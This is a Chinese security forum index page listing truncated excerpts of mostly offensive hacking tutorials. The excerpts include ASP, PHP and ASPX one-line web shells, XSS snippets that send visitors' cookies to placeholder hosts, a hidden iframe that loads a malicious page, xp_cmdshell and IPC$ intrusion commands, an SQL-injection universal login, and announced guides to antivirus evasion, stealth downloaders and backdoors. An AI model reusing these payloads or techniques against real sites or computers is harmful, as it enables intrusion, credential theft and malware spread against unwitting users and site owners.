安全 - 第185页-OStack程序员社区-中国程序员成长平台

OStack程序员社区-中国程序员成长平台 › 门户 ›安全

安全

RSS

下级分类:

安全教程

实战讲解跨站入侵攻击

很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”，那么什么是 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：156 | 回复：0
安全教程

黑客入侵网络的五十种方法

现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。　　1.网宽网络有限公司制作的网站基本都有注入漏洞搜索网宽网络　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：150 | 回复：0
安全教程

CSRF—攻击与防御

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：166 | 回复：0
安全教程

弹窗口的流氓软件核心代码

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹程序安装成服务，并设置为自动启动。启动之后写入一段代码到 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：155 | 回复：0
安全教程

木马免杀绝招以及常用的修改方法

常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：150 | 回复：0
安全教程

asp+js 偷取Cookies源代码

偷取Cookie，通过以下脚本引入一个js，document.write(script src=XX.js/script)，然后js内容为： var code;　　　　　　　　　 var target = http://www.xxx.net/cookie.asp?; info=escape(document.location+@@ ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：161 | 回复：0
安全教程

linux下mysql 5.x得到root密码后的另外一种利用方式

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4, ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：171 | 回复：0
安全教程

FCKeditor JSP版漏洞

FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUploadType=ImageCurrentFolder=%2F http://www.xxx.com/fckeditor/editor/file ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：157 | 回复：0
安全教程

phpMyAdmin table参数SQL注入漏洞

影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin的./phpmyadmin/libraries/db_table_exi ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：155 | 回复：0
安全教程

mysql 读取文件的几种方式及应用

章出处:C.R.S.T 作者:sai52 blog:www.sai52.com 今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。思路都一样，在拥有file权限的前提下，读取 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：153 | 回复：0
安全教程

利用windows自带功能做永不被查杀的下载者(超小体积)！

用windows自带功能做永不被查杀，超小体积的下载者！利用windows自带功能做永不被查杀，超小体积的下载者！今天自己搞出来个永不会被杀的下载者好东西就要拿出来和大家分享,,, 把制作过程告诉大家吧.... 看不 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：161 | 回复：0
安全教程

判断数据库web是否分离的技巧

得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离，结果不一样就是分离的点评：在实际的渗透过程中，我们常常会困惑数据库和web究竟是否在一台 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：138 | 回复：0
安全教程

一句话木马(asp,php) 总结篇

asp一句话 %execute(request(1))% php一句话 ?php eval($_POST);? aspx一句话 script language=C# runat=server WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(add6bb58e139be10); /……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：156 | 回复：0
安全教程

asp php XSS获取cookie的代码

scriptdocument.write('img src=http://url/news.asp?msg='+document.cookie+' width=0 height=0 border=0 /');/script news.asp代码： % msg=Request.ServerVariables(QUERY_STRING) testfile=Server.MapPath( ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：157 | 回复：0
安全教程

冰河暗涌防不胜防 BIOS下实现的Telnet后门

该项目仅为实验性项目，主要目的是想隐藏一个Telnet后门在主板的BIOS内，并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。项目涉及的相关知识及技术目录 1、实验环 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：141 | 回复：0
安全教程

汇编揭开死循环的神秘面纱

i 首先请大家看这么一个简单的小程序： #includestdio.h voidmain() { inti,b; for(i=0;i=10;&……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：168 | 回复：0
安全教程

用递归写Win32的文件夹遍历

文件夹遍历技术是一种非常有用的技术，在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。文件夹遍历技术的核心就是使用递归算法，关于递归算法，我这里就不多介绍了，不明白的 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：160 | 回复：0
安全教程

“QQ反骚扰”开发手记

呆在家中上网聊天实在不是一件惬意的事：每一天打开QQ，迎接我的都是一串一串的广告国庆黄金周，连广告也不放过！：（无奈，打开Visual C++，开始了我的反骚扰之路。首先我面对的问题是：QQ一共有几种广告，我 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：130 | 回复：0
安全教程

让本地连接不再受限

　　本地连接突然受限　　单位局域网中有一台旧计算机，平时安装使用的是Windows XP系统，在该系统环境下该计算机可以正常访问网络;后来，某位同事为了能够在第一时间体验到Windows Vista系统的精彩，特意对该计 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：123 | 回复：0
安全教程

SQL语句导入导出大全

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -SGNETDATA/GNETDATA -Usa -P' /*********** 导入Excel Select * FROM OpenDataSource( 'Microsoft.Jet.OL ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：238 | 回复：0
安全教程

黑客教你7招秘籍入侵xp系统

　第一招:屏幕保护　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：152 | 回复：0
安全教程

汗颜:黑客居然这样保护自己的电脑

看了你昨天的留言，我才知道原来木马可以用这么多方式传播呀。那我想问你一件事，常在河边走，哪有不湿鞋，你经常黑别人，难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢? 　　就像你说的那样，我也中过木马 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：145 | 回复：0
安全教程

高手支招:通过进程抓马

　对于进程这个概念，许多电脑用户都没有给予太多关注。在很多人印象里，只知道结束进程可以杀死程序，至于哪些进程对应哪些程序，究竟什么样的进程该杀，什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：139 | 回复：0
安全教程

ASP注入万能登陆密码

《黑客手册》样刊里面，oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码：　　程序代码　　% 　　username=trim(Request.Form(username)) 　　password=trim(Request.Form(password)) 　　sql= ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：151 | 回复：0
安全教程

容易被黑客攻击的10个漏洞

　　应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散，但它们也同样会造成很多问题，从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：127 | 回复：0
安全教程

139入侵简易教程

　　net use\192.168.0.1ipc$Content$nbsp; /user:administrator 　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。　　首先，连接的命令是：　　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：154 | 回复：0
安全教程

有史以来最牛的服务器反黑全集

　Win2k的缺省安装很容易被攻击者取得帐号列表，即使安装了最新的Service ack也是如此。　　方案一　　1.打补丁　　微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用开始-WindowsUpd ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：144 | 回复：0
安全教程

黑客快速入门

今天的内容是获得主机的信息。我们要黑一台主机，首先要了解它的信息，　　包括它的类型，用户列表，目录，端口，漏洞等等。　　首先我们我们要找一台主机来练手，随便挑吧！www.dddd.com(乱说的)第一部，呵呵， ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：154 | 回复：0
安全教程

秒杀Google浏览器

用Google浏览器浏览此篇文章，并点击下面的字符：　　EVIL:% 　　是不是很爽，^_^。……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：169 | 回复：0
安全教程

犀利的 oracle 注入技术

犀利的 oracle 注入技术　　原文发表在黑客手册　　linx 2008.1.12 　　介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。　　以下的演示都是在web上的sql plus执行的，在web注入时把select SYS.D ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：183 | 回复：0
安全教程

mssql的sa权限执行命令方法总结

　测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动）　　一．xp_cmdshell 　　EXEC master..xp_cmdshell ipconfig 　　开启xp_cmdshell: 　　 To allow advanced options to be changed. 　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：285 | 回复：0
安全教程

用U盘就可黑进有密码的Windows系统

　　【赛迪网-IT技术报道】U盘如今可以说非常普及了，不过，如果只是把它用来存储数据的话，也许有点可惜了。其实，我们还可以让U盘发挥更大的能量！今天小编教你一招，能让你的U盘代替登录系统的密码，只有当你插 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：253 | 回复：0
安全教程

详解挂马方法和技巧

1，挂马的N种方法　　(1) HTML挂马法。　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像iframe src=http://www.xxx.com/horse.html width=0 height=0/iframe。查看站点是否被挂，一般是查找一下关键 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：244 | 回复：0
安全教程

菜鸟是如何变成ASP木马高手的！

1.名称：如何制作图片ASP木马　　建一个asp文件，内容为!--＃i nclude file=ating.jpg-- 　　找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：250 | 回复：0
安全教程

木马连接原理

　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他噶端口。而我们要知道距噶IP，先可以连接他。123就是他机器上开的端口　　由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：241 | 回复：0
安全教程

如何多开QQ游戏大厅

用WinHEX打开QQ游戏目录Tencent＼QQGame＼common＼Utility.dll文件　　搜索3DB70000008BCE7507 　　将其修改为3DB70000008BCEEB07 　　保存后，再打开QQ游戏大厅，发现已经可以多开了！ ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：245 | 回复：0
安全教程

“回收站”使用技巧集锦

　★巧用回收站的编辑菜单　　如果要删除回收站中的大多数文件，不用费劲地将它们一一选中，可以首先选中不删除的文件；然后在菜单中点击编辑反向选择，则系统将选中需要删除的文件；最后单 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：234 | 回复：0
安全教程

IP欺骗原理精解及防范手段综述

　　即使是很好的实现了TCP/IP协议，由于它本身有着一些不安全的地方，从而可以对TCP/IP网络进行攻击。这些攻击包括序列号欺骗，路由攻击，源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外，还介绍怎样防止这个 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：235 | 回复：0
安全教程

网络技术常用术语中英对照

　 LAN　　　　局域网　　WAN　　　广域网　　UTP　　　　非屏蔽的双绞线　　STP　　　　屏蔽的双绞线　　ATM　　　　异步传输模式　　FDDI　　　光纤分布式数据接口　　CSMA/CD　载波侦听多路访问方 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：249 | 回复：0
安全教程

个人主机入侵网络攻击的步骤

　　个人主机入侵网络攻击的步骤　　第一步：隐藏自已的位置　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽量通过跳板或肉鸡展开攻击。所谓肉鸡通常是指，HACK实现通过后 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:15 | 阅读：244 | 回复：0